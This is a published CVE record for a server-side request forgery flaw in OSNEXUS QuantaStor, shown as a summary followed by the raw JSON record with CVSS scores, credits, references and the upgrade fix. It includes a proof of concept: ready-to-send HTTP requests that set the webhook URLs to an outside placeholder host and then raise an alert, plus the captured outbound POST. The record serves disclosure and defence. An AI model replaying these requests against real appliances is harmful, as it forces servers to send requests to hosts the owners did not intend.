CVE-2021-42079 (GCVE-0-2021-42079)
Vulnerability from cvelistv5
Published
2023-07-10 06:29
Modified
2025-09-22 06:40
CWE
  • CWE-918 - Server-Side Request Forgery (SSRF)
Summary
An authenticated administrator can configure the alerting settings so that raising an alert makes the appliance issue a server-side request (SSRF) to a URL of the administrator's choosing: the slackWebhookUrl and mattermostWebhookUrl parameters of alertConfigSet are stored and later used verbatim as outbound destinations. The forged request is always a POST (the appliance posts the alert payload to the configured webhook URL), so the primitive is limited to POST requests; the attacker does not see the response.

POC

Step 1: Prepare the SSRF by storing the attacker-controlled webhook URLs in the alert configuration (only the two webhook parameters matter; the other parameters are filled with dummy values):

GET /qstorapi/alertConfigSet?senderEmailAddress=a&smtpServerIpAddress=BURPCOLLABHOST&smtpServerPort=25&smtpUsername=a&smtpPassword=1&smtpAuthType=1&customerSupportEmailAddress=1&poolFreeSpaceWarningThreshold=1&poolFreeSpaceAlertThreshold=1&poolFreeSpaceCriticalAlertThreshold=1&pagerDutyServiceKey=1&slackWebhookUrl=http://<TARGET>&enableAlertTypes&enableAlertTypes=1&disableAlertTypes=1&pauseAlertTypes=1&mattermostWebhookUrl=http://<TARGET> HTTP/1.1
Host: <HOSTNAME>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Connection: close
authorization: Basic <BASIC_AUTH_HASH>
Content-Type: application/json
Content-Length: 0

Step 2: Trigger an alert; the appliance now posts it to the configured webhook URLs:

GET /qstorapi/alertRaise?title=test&message=test&severity=1 HTTP/1.1
Host: <HOSTNAME>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Connection: close
authorization: Basic <BASIC_AUTH_HASH>
Content-Type: application/json
Content-Length: 1

The POST request received by <TARGET> looks like this (captured with a Python Flask listener; the Flask request attributes are shown around the body). Note the outbound User-Agent of curl/7.58.0 and the fixed "QuantaStor Call-home Alert" footer, which are the fingerprint of this traffic in proxy or egress logs:

{
    ### Python FLASK stuff ####
    'endpoint': 'index',
    'method': 'POST',
    'cookies': ImmutableMultiDict([]),
    ### END Python FLASK stuff ####
    'data': b'{
        "attachments": [
            {
                "fallback": "[122] test / test.",
                "color": "#aa2222",
                "title": "[122] test",
                "text": "test",
                "fields": [
                    {
                        "title": "Alert Severity",
                        "value": "CRITICAL",
                        "short": false
                    },
                    {
                        "title": "Appliance",
                        "value": "quantastor (https://<HOSTNAME>)",
                        "short": true
                    },
                    {
                        "title": "System / Driver / Kernel Ver",
                        "value": "5.10.0.156+a25eaacef / scst-3.5.0-pre / 5.3.0-62-generic",
                        "short": false
                    },
                    {
                        "title": "System Startup",
                        "value": "Fri Aug  6 16-02-55 2021",
                        "short": true
                    },
                    {
                        "title": "SSID",
                        "value": "f4823762-1dd1-1333-47a0-6238c474a7e7",
                        "short": true
                    },
                ],
                "footer": "QuantaStor Call-home Alert",
                "footer_icon": " https://platform.slack-edge.com/img/default_application_icon.png ",
                "ts": 1628461774
            }
        ],
        "mrkdwn":true
    }',
    #### FLASK REQUEST STUFF #####
    'headers': {
        'Host': '<redacted>',
        'User-Agent': 'curl/7.58.0',
        'Accept': '*/*',
        'Content-Type': 'application/json',
        'Content-Length': '790'
    },
    'args': ImmutableMultiDict([]),
    'form': ImmutableMultiDict([]),
    'remote_addr': '217.103.63.173',
    'path': '/payload/58',
    'whois_ip': 'TNF-AS, NL'
    #### END FLASK REQUEST STUFF #####
}
Impacted products
Vendor    Product       Version
OSNEXUS   QuantaStor    all versions before 6.0.0.355 (the record lists version 0 with lessThan 6.0.0.355)


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-04T03:22:25.855Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "third-party-advisory",
              "x_transferred"
            ],
            "url": "https://www.wbsec.nl/osnexus"
          },
          {
            "tags": [
              "third-party-advisory",
              "x_transferred"
            ],
            "url": "https://www.divd.nl/DIVD-2021-00020"
          },
          {
            "tags": [
              "product",
              "x_transferred"
            ],
            "url": "https://www.osnexus.com/products/software-defined-storage"
          },
          {
            "tags": [
              "third-party-advisory",
              "x_transferred"
            ],
            "url": "https://csirt.divd.nl/CVE-2021-42079"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2021-42079",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-11-04T20:06:08.530050Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-11-04T20:06:17.817Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "collectionURL": "https://www.osnexus.com/downloads",
          "defaultStatus": "unknown",
          "platforms": [
            "Windows",
            "Linux"
          ],
          "product": "QuantaStor",
          "vendor": "OSNEXUS",
          "versions": [
            {
              "lessThan": "6.0.0.355",
              "status": "affected",
              "version": "0",
              "versionType": "semver"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "value": "Wietse Boonstra (DIVD)"
        },
        {
          "lang": "en",
          "type": "analyst",
          "value": "Frank Breedijk (DIVD)"
        },
        {
          "lang": "en",
          "type": "analyst",
          "value": "Victor Pasman (DIVD)"
        },
        {
          "lang": "en",
          "type": "analyst",
          "value": "Victor Gevers (DIVD)"
        },
        {
          "lang": "en",
          "type": "analyst",
          "value": "Max van der Horst (DIVD)"
        },
        {
          "lang": "en",
          "type": "analyst",
          "value": "C\u00e9listine Oosting (DIVD)"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "An authenticated administrator is able to prepare an alert that is able to execute an SSRF attack. This is exclusively with POST requests.\u003cbr\u003e\u003cbr\u003ePOC\u003cbr\u003e\u003cbr\u003eStep 1: Prepare the SSRF with a request like this:\u003cbr\u003e\u003cbr\u003e\u003ctt\u003e\u003cspan style=\"background-color: rgba(29, 28, 29, 0.04);\"\u003eGET /qstorapi/alertConfigSet?senderEmailAddress=a\u0026amp;smtpServerIpAddress=BURPCOLLABHOST\u0026amp;smtpServerPort=25\u0026amp;smtpUsername=a\u0026amp;smtpPassword=1\u0026amp;smtpAuthType=1\u0026amp;customerSupportEmailAddress=1\u0026amp;poolFreeSpaceWarningThreshold=1\u0026amp;poolFreeSpaceAlertThreshold=1\u0026amp;poolFreeSpaceCriticalAlertThreshold=1\u0026amp;pagerDutyServiceKey=1\u0026amp;slackWebhookUrl=\u003c/span\u003ehttp://\u0026lt;target\u0026gt;\u003cspan style=\"background-color: rgba(29, 28, 29, 0.04);\"\u003e\u0026amp;enableAlertTypes\u0026amp;enableAlertTypes=1\u0026amp;disableAlertTypes=1\u0026amp;pauseAlertTypes=1\u0026amp;mattermostWebhookUrl=\u003c/span\u003ehttp://\u0026lt;TARGET\u0026gt;\u003cbr\u003e\u003cspan style=\"background-color: rgba(29, 28, 29, 0.04);\"\u003eHTTP/1.1\n\u003cbr\u003eHost: \u0026lt;HOSTNAME\u0026gt; \u003cbr\u003eAccept-Encoding: gzip, deflate\n\u003cbr\u003eAccept: */*\nAccept-Language: en\n\u003cbr\u003eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\u003cbr\u003e\nConnection: close\n\u003cbr\u003eauthorization: Basic \u0026lt;BASIC_AUTH_HASH\u0026gt; \u003cbr\u003eContent-Type: application/json\n\u003cbr\u003eContent-Length: 0\u003c/span\u003e\u003c/tt\u003e\u003cbr\u003e\u003ctt\u003e\u003cbr\u003eStep 2: Trigger this alert with this request\u003cbr\u003e\u003cbr\u003e\u003cspan style=\"background-color: rgba(29, 28, 29, 0.04);\"\u003eGET /qstorapi/alertRaise?title=test\u0026amp;message=test\u0026amp;severity=1 \u003cbr\u003eHTTP/1.1\n\u003cbr\u003eHost: 
\u0026lt;HOSTNAME\u0026gt; \u003cbr\u003eAccept-Encoding: gzip, deflate\n\u003cbr\u003eAccept: */*\n\u003cbr\u003eAccept-Language: en\n\u003cbr\u003eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\n\u003cbr\u003eConnection: close\n\u003cbr\u003eauthorization: Basic \u0026lt;BASIC_AUTH_HASH\u0026gt; \u003cbr\u003eContent-Type: application/json\n\u003cbr\u003eContent-Length: 1\u003cbr\u003e\u003cbr\u003e\u003c/span\u003e\u003c/tt\u003eThe post request received by \u0026lt;TARGET\u0026gt; looks like this:\u003cbr\u003e\u003cspan style=\"background-color: rgba(29, 28, 29, 0.04);\"\u003e{\u003cbr\u003e\u2003\n### Python FLASK stuff ####\n\u003cbr\u003e\u2003\u0027endpoint\u0027: \u0027index\u0027, \u003cbr\u003e\u2003\n\u0027method\u0027: \u0027POST\u0027, \u003cbr\u003e\u2003\n\u0027cookies\u0027: ImmutableMultiDict([]), \u003cbr\u003e\u2003\n### END Python FLASK stuff ####\n\u003cbr\u003e\u2003\n\u0027data\u0027: b\u0027{ \u003cbr\u003e\u2003\u2003\"attachments\": [ \u003cbr\u003e\u2003\u2003\u2003{\n\u003cbr\u003e\u2003\u2003\u2003\u2003\"fallback\": \"[122] test / test.\",\n\u003cbr\u003e\u2003\u2003\u2003\u2003\"color\": \"#aa2222\",\n\u003cbr\u003e\u2003\u2003\u2003\u2003\"title\": \"[122] test\",\n\u003cbr\u003e\u2003\u2003\u2003\u2003\"text\": \"test\",\n\u003cbr\u003e\u2003\u2003\u2003\u2003\"fields\": [ \u0026nbsp; \u003cbr\u003e\u2003\u2003\u2003\u2003\u2003{ \u0026nbsp; \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"Alert Severity\",\n     \u0026nbsp; \u0026nbsp;\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"CRITICAL\",\n     \u0026nbsp; \u0026nbsp;\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"short\": false \u0026nbsp;\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003}, \u0026nbsp;{ \u0026nbsp; \u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"Appliance\", \u0026nbsp; \u0026nbsp; 
\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"quantastor (\u003c/span\u003ehttps://\u0026lt;HOSTNAME\u0026gt;\u003cspan style=\"background-color: rgba(29, 28, 29, 0.04);\"\u003e)\",\n  \u0026nbsp; \u0026nbsp; \u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"short\": true \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003}, \u0026nbsp;{ \u0026nbsp; \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"System / Driver / Kernel Ver\", \u0026nbsp; \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"5.10.0.156+a25eaacef / scst-3.5.0-pre / 5.3.0-62-generic\", \u0026nbsp; \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"short\": false \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003}, \u0026nbsp;{ \u0026nbsp; \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"System Startup\", \u0026nbsp; \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"Fri Aug \u0026nbsp;6 16-02-55 2021\", \u0026nbsp; \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"short\": true \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003     }, \u0026nbsp;{ \u0026nbsp; \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"SSID\", \u0026nbsp; \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"f4823762-1dd1-1333-47a0-6238c474a7e7\", \u0026nbsp; \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"short\": true \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003},\u003cbr\u003e\u2003\u2003\u2003\u2003],\n\u003cbr\u003e\u2003\u2003\u2003\u2003\"footer\": \"QuantaStor Call-home Alert\",\n\u003cbr\u003e\u2003\u2003\u2003\u2003\"footer_icon\": \"\u003c/span\u003e\u003ca target=\"_blank\" rel=\"nofollow\" href=\"https://platform.slack-edge.com/img/default_application_icon.png\"\u003ehttps://platform.slack-edge.com/img/default_application_icon.png\u003c/a\u003e\u003cspan 
style=\"background-color: rgba(29, 28, 29, 0.04);\"\u003e\",\n\u003cbr\u003e\u2003\u2003\u2003\u2003\"ts\": 1628461774\u003cbr\u003e\u2003\u2003\u2003}\u003cbr\u003e\u2003\u2003], \u003cbr\u003e\u2003\u2003\"mrkdwn\":true \u003cbr\u003e\u2003}\u0027, \u003cbr\u003e\u2003#### FLASK REQUEST STUFF #####\n\u003cbr\u003e\u2003\u0027headers\u0027: {\n\u003cbr\u003e\u2003\u2003\u0027Host\u0027: \u0027\u0026lt;redacted\u0026gt;\u0027, \u003cbr\u003e\u2003\u2003\u0027User-Agent\u0027: \u0027curl/7.58.0\u0027, \u003cbr\u003e\u2003\u2003\u0027Accept\u0027: \u0027*/*\u0027, \u003cbr\u003e\u2003\u2003\u0027Content-Type\u0027: \u0027application/json\u0027, \u003cbr\u003e\u2003\u2003\u0027Content-Length\u0027: \u0027790\u0027\n\u003cbr\u003e\u2003}, \u003cbr\u003e\u2003\u0027args\u0027: ImmutableMultiDict([]), \u003cbr\u003e\u2003\u0027form\u0027: ImmutableMultiDict([]), \u003cbr\u003e\u2003\u0027remote_addr\u0027: \u0027217.103.63.173\u0027, \u003cbr\u003e\u2003\u0027path\u0027: \u0027/payload/58\u0027, \u003cbr\u003e\u2003\u0027whois_ip\u0027: \u0027TNF-AS, NL\u0027\u003cbr\u003e}\n\u003cbr\u003e#### END FLASK REQUEST STUFF #####\u003c/span\u003e\u003ctt\u003e\u003c/tt\u003e"
            }
          ],
          "value": "An authenticated administrator is able to prepare an alert that is able to execute an SSRF attack. This is exclusively with POST requests.\n\nPOC\n\nStep 1: Prepare the SSRF with a request like this:\n\nGET /qstorapi/alertConfigSet?senderEmailAddress=a\u0026smtpServerIpAddress=BURPCOLLABHOST\u0026smtpServerPort=25\u0026smtpUsername=a\u0026smtpPassword=1\u0026smtpAuthType=1\u0026customerSupportEmailAddress=1\u0026poolFreeSpaceWarningThreshold=1\u0026poolFreeSpaceAlertThreshold=1\u0026poolFreeSpaceCriticalAlertThreshold=1\u0026pagerDutyServiceKey=1\u0026slackWebhookUrl=http://\u003ctarget\u003e\u0026enableAlertTypes\u0026enableAlertTypes=1\u0026disableAlertTypes=1\u0026pauseAlertTypes=1\u0026mattermostWebhookUrl=http://\u003cTARGET\u003e\nHTTP/1.1\n\nHost: \u003cHOSTNAME\u003e \nAccept-Encoding: gzip, deflate\n\nAccept: */*\nAccept-Language: en\n\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\n\nConnection: close\n\nauthorization: Basic \u003cBASIC_AUTH_HASH\u003e \nContent-Type: application/json\n\nContent-Length: 0\n\nStep 2: Trigger this alert with this request\n\nGET /qstorapi/alertRaise?title=test\u0026message=test\u0026severity=1 \nHTTP/1.1\n\nHost: \u003cHOSTNAME\u003e \nAccept-Encoding: gzip, deflate\n\nAccept: */*\n\nAccept-Language: en\n\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\n\nConnection: close\n\nauthorization: Basic \u003cBASIC_AUTH_HASH\u003e \nContent-Type: application/json\n\nContent-Length: 1\n\nThe post request received by \u003cTARGET\u003e looks like this:\n{\n\u2003\n### Python FLASK stuff ####\n\n\u2003\u0027endpoint\u0027: \u0027index\u0027, \n\u2003\n\u0027method\u0027: \u0027POST\u0027, \n\u2003\n\u0027cookies\u0027: ImmutableMultiDict([]), \n\u2003\n### END Python FLASK stuff ####\n\n\u2003\n\u0027data\u0027: b\u0027{ \n\u2003\u2003\"attachments\": [ 
\n\u2003\u2003\u2003{\n\n\u2003\u2003\u2003\u2003\"fallback\": \"[122] test / test.\",\n\n\u2003\u2003\u2003\u2003\"color\": \"#aa2222\",\n\n\u2003\u2003\u2003\u2003\"title\": \"[122] test\",\n\n\u2003\u2003\u2003\u2003\"text\": \"test\",\n\n\u2003\u2003\u2003\u2003\"fields\": [ \u00a0 \n\u2003\u2003\u2003\u2003\u2003{ \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"Alert Severity\",\n     \u00a0 \u00a0\n\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"CRITICAL\",\n     \u00a0 \u00a0\n\u2003\u2003\u2003\u2003\u2003\u2003\"short\": false \u00a0\n\u2003\u2003\u2003\u2003\u2003}, \u00a0{ \u00a0 \n\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"Appliance\", \u00a0 \u00a0 \n\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"quantastor (https://\u003cHOSTNAME\u003e)\",\n  \u00a0 \u00a0 \n\u2003\u2003\u2003\u2003\u2003\u2003\"short\": true \u00a0\n\n\u2003\u2003\u2003\u2003\u2003}, \u00a0{ \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"System / Driver / Kernel Ver\", \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"5.10.0.156+a25eaacef / scst-3.5.0-pre / 5.3.0-62-generic\", \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"short\": false \u00a0\n\n\u2003\u2003\u2003\u2003\u2003}, \u00a0{ \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"System Startup\", \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"Fri Aug \u00a06 16-02-55 2021\", \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"short\": true \u00a0\n\n\u2003\u2003\u2003\u2003\u2003     }, \u00a0{ \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"SSID\", \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"f4823762-1dd1-1333-47a0-6238c474a7e7\", \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"short\": true \u00a0\n\n\u2003\u2003\u2003\u2003\u2003},\n\u2003\u2003\u2003\u2003],\n\n\u2003\u2003\u2003\u2003\"footer\": \"QuantaStor Call-home 
Alert\",\n\n\u2003\u2003\u2003\u2003\"footer_icon\": \" https://platform.slack-edge.com/img/default_application_icon.png \",\n\n\u2003\u2003\u2003\u2003\"ts\": 1628461774\n\u2003\u2003\u2003}\n\u2003\u2003], \n\u2003\u2003\"mrkdwn\":true \n\u2003}\u0027, \n\u2003#### FLASK REQUEST STUFF #####\n\n\u2003\u0027headers\u0027: {\n\n\u2003\u2003\u0027Host\u0027: \u0027\u003credacted\u003e\u0027, \n\u2003\u2003\u0027User-Agent\u0027: \u0027curl/7.58.0\u0027, \n\u2003\u2003\u0027Accept\u0027: \u0027*/*\u0027, \n\u2003\u2003\u0027Content-Type\u0027: \u0027application/json\u0027, \n\u2003\u2003\u0027Content-Length\u0027: \u0027790\u0027\n\n\u2003}, \n\u2003\u0027args\u0027: ImmutableMultiDict([]), \n\u2003\u0027form\u0027: ImmutableMultiDict([]), \n\u2003\u0027remote_addr\u0027: \u0027217.103.63.173\u0027, \n\u2003\u0027path\u0027: \u0027/payload/58\u0027, \n\u2003\u0027whois_ip\u0027: \u0027TNF-AS, NL\u0027\n}\n\n#### END FLASK REQUEST STUFF #####"
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 6.2,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "HIGH",
            "scope": "CHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:N/A:N",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-918",
              "description": "CWE-918 Server-Side Request Forgery (SSRF)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-09-22T06:40:03.059Z",
        "orgId": "b87402ff-ae37-4194-9dae-31abdbd6f217",
        "shortName": "DIVD"
      },
      "references": [
        {
          "tags": [
            "third-party-advisory",
            "technical-description"
          ],
          "url": "https://www.wbsec.nl/osnexus"
        },
        {
          "tags": [
            "third-party-advisory",
            "exploit",
            "technical-description"
          ],
          "url": "https://cisrt.divd.nl/DIVD-2021-00020/"
        },
        {
          "tags": [
            "product"
          ],
          "url": "https://www.osnexus.com/products/software-defined-storage"
        },
        {
          "tags": [
            "third-party-advisory"
          ],
          "url": "https://csirt.divd.nl/CVE-2021-42079"
        }
      ],
      "solutions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "Upgrade to the latest version of OSNEXUS QuantaStor."
            }
          ],
          "value": "Upgrade to the latest version of OSNEXUS QuantaStor."
        }
      ],
      "source": {
        "discovery": "INTERNAL"
      },
      "title": "SSRF vulnerability in OSNEXUS QuantaStor before 6.0.0.355",
      "x_generator": {
        "engine": "Vulnogram 0.1.0-dev"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "b87402ff-ae37-4194-9dae-31abdbd6f217",
    "assignerShortName": "DIVD",
    "cveId": "CVE-2021-42079",
    "datePublished": "2023-07-10T06:29:48.339Z",
    "dateReserved": "2021-10-07T17:12:57.677Z",
    "dateUpdated": "2025-09-22T06:40:03.059Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2021-42079\",\"sourceIdentifier\":\"csirt@divd.nl\",\"published\":\"2023-07-10T16:15:47.467\",\"lastModified\":\"2025-09-22T07:15:38.950\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"An authenticated administrator is able to prepare an alert that is able to execute an SSRF attack. This is exclusively with POST requests.\\n\\nPOC\\n\\nStep 1: Prepare the SSRF with a request like this:\\n\\nGET /qstorapi/alertConfigSet?senderEmailAddress=a\u0026smtpServerIpAddress=BURPCOLLABHOST\u0026smtpServerPort=25\u0026smtpUsername=a\u0026smtpPassword=1\u0026smtpAuthType=1\u0026customerSupportEmailAddress=1\u0026poolFreeSpaceWarningThreshold=1\u0026poolFreeSpaceAlertThreshold=1\u0026poolFreeSpaceCriticalAlertThreshold=1\u0026pagerDutyServiceKey=1\u0026slackWebhookUrl=http://\u003ctarget\u003e\u0026enableAlertTypes\u0026enableAlertTypes=1\u0026disableAlertTypes=1\u0026pauseAlertTypes=1\u0026mattermostWebhookUrl=http://\u003cTARGET\u003e\\nHTTP/1.1\\n\\nHost: \u003cHOSTNAME\u003e \\nAccept-Encoding: gzip, deflate\\n\\nAccept: */*\\nAccept-Language: en\\n\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\\n\\nConnection: close\\n\\nauthorization: Basic \u003cBASIC_AUTH_HASH\u003e \\nContent-Type: application/json\\n\\nContent-Length: 0\\n\\nStep 2: Trigger this alert with this request\\n\\nGET /qstorapi/alertRaise?title=test\u0026message=test\u0026severity=1 \\nHTTP/1.1\\n\\nHost: \u003cHOSTNAME\u003e \\nAccept-Encoding: gzip, deflate\\n\\nAccept: */*\\n\\nAccept-Language: en\\n\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\\n\\nConnection: close\\n\\nauthorization: Basic \u003cBASIC_AUTH_HASH\u003e \\nContent-Type: application/json\\n\\nContent-Length: 1\\n\\nThe post request received by \u003cTARGET\u003e looks like this:\\n{\\n\u2003\\n### 
Python FLASK stuff ####\\n\\n\u2003\u0027endpoint\u0027: \u0027index\u0027, \\n\u2003\\n\u0027method\u0027: \u0027POST\u0027, \\n\u2003\\n\u0027cookies\u0027: ImmutableMultiDict([]), \\n\u2003\\n### END Python FLASK stuff ####\\n\\n\u2003\\n\u0027data\u0027: b\u0027{ \\n\u2003\u2003\\\"attachments\\\": [ \\n\u2003\u2003\u2003{\\n\\n\u2003\u2003\u2003\u2003\\\"fallback\\\": \\\"[122] test / test.\\\",\\n\\n\u2003\u2003\u2003\u2003\\\"color\\\": \\\"#aa2222\\\",\\n\\n\u2003\u2003\u2003\u2003\\\"title\\\": \\\"[122] test\\\",\\n\\n\u2003\u2003\u2003\u2003\\\"text\\\": \\\"test\\\",\\n\\n\u2003\u2003\u2003\u2003\\\"fields\\\": [ \u00a0 \\n\u2003\u2003\u2003\u2003\u2003{ \u00a0 \u00a0\\n\\n\u2003\u2003\u2003\u2003\u2003\u2003\\\"title\\\": \\\"Alert Severity\\\",\\n     \u00a0 \u00a0\\n\u2003\u2003\u2003\u2003\u2003\u2003\\\"value\\\": \\\"CRITICAL\\\",\\n     \u00a0 \u00a0\\n\u2003\u2003\u2003\u2003\u2003\u2003\\\"short\\\": false \u00a0\\n\u2003\u2003\u2003\u2003\u2003}, \u00a0{ \u00a0 \\n\u2003\u2003\u2003\u2003\u2003\u2003\\\"title\\\": \\\"Appliance\\\", \u00a0 \u00a0 \\n\u2003\u2003\u2003\u2003\u2003\u2003\\\"value\\\": \\\"quantastor (https://\u003cHOSTNAME\u003e)\\\",\\n  \u00a0 \u00a0 \\n\u2003\u2003\u2003\u2003\u2003\u2003\\\"short\\\": true \u00a0\\n\\n\u2003\u2003\u2003\u2003\u2003}, \u00a0{ \u00a0 \u00a0\\n\\n\u2003\u2003\u2003\u2003\u2003\u2003\\\"title\\\": \\\"System / Driver / Kernel Ver\\\", \u00a0 \u00a0\\n\\n\u2003\u2003\u2003\u2003\u2003\u2003\\\"value\\\": \\\"5.10.0.156+a25eaacef / scst-3.5.0-pre / 5.3.0-62-generic\\\", \u00a0 \u00a0\\n\\n\u2003\u2003\u2003\u2003\u2003\u2003\\\"short\\\": false \u00a0\\n\\n\u2003\u2003\u2003\u2003\u2003}, \u00a0{ \u00a0 \u00a0\\n\\n\u2003\u2003\u2003\u2003\u2003\u2003\\\"title\\\": \\\"System Startup\\\", \u00a0 \u00a0\\n\\n\u2003\u2003\u2003\u2003\u2003\u2003\\\"value\\\": \\\"Fri Aug \u00a06 16-02-55 2021\\\", \u00a0 \u00a0\\n\\n\u2003\u2003\u2003\u2003\u2003\u2003\\\"short\\\": true 
\u00a0\\n\\n\u2003\u2003\u2003\u2003\u2003     }, \u00a0{ \u00a0 \u00a0\\n\\n\u2003\u2003\u2003\u2003\u2003\u2003\\\"title\\\": \\\"SSID\\\", \u00a0 \u00a0\\n\\n\u2003\u2003\u2003\u2003\u2003\u2003\\\"value\\\": \\\"f4823762-1dd1-1333-47a0-6238c474a7e7\\\", \u00a0 \u00a0\\n\\n\u2003\u2003\u2003\u2003\u2003\u2003\\\"short\\\": true \u00a0\\n\\n\u2003\u2003\u2003\u2003\u2003},\\n\u2003\u2003\u2003\u2003],\\n\\n\u2003\u2003\u2003\u2003\\\"footer\\\": \\\"QuantaStor Call-home Alert\\\",\\n\\n\u2003\u2003\u2003\u2003\\\"footer_icon\\\": \\\" https://platform.slack-edge.com/img/default_application_icon.png \\\",\\n\\n\u2003\u2003\u2003\u2003\\\"ts\\\": 1628461774\\n\u2003\u2003\u2003}\\n\u2003\u2003], \\n\u2003\u2003\\\"mrkdwn\\\":true \\n\u2003}\u0027, \\n\u2003#### FLASK REQUEST STUFF #####\\n\\n\u2003\u0027headers\u0027: {\\n\\n\u2003\u2003\u0027Host\u0027: \u0027\u003credacted\u003e\u0027, \\n\u2003\u2003\u0027User-Agent\u0027: \u0027curl/7.58.0\u0027, \\n\u2003\u2003\u0027Accept\u0027: \u0027*/*\u0027, \\n\u2003\u2003\u0027Content-Type\u0027: \u0027application/json\u0027, \\n\u2003\u2003\u0027Content-Length\u0027: 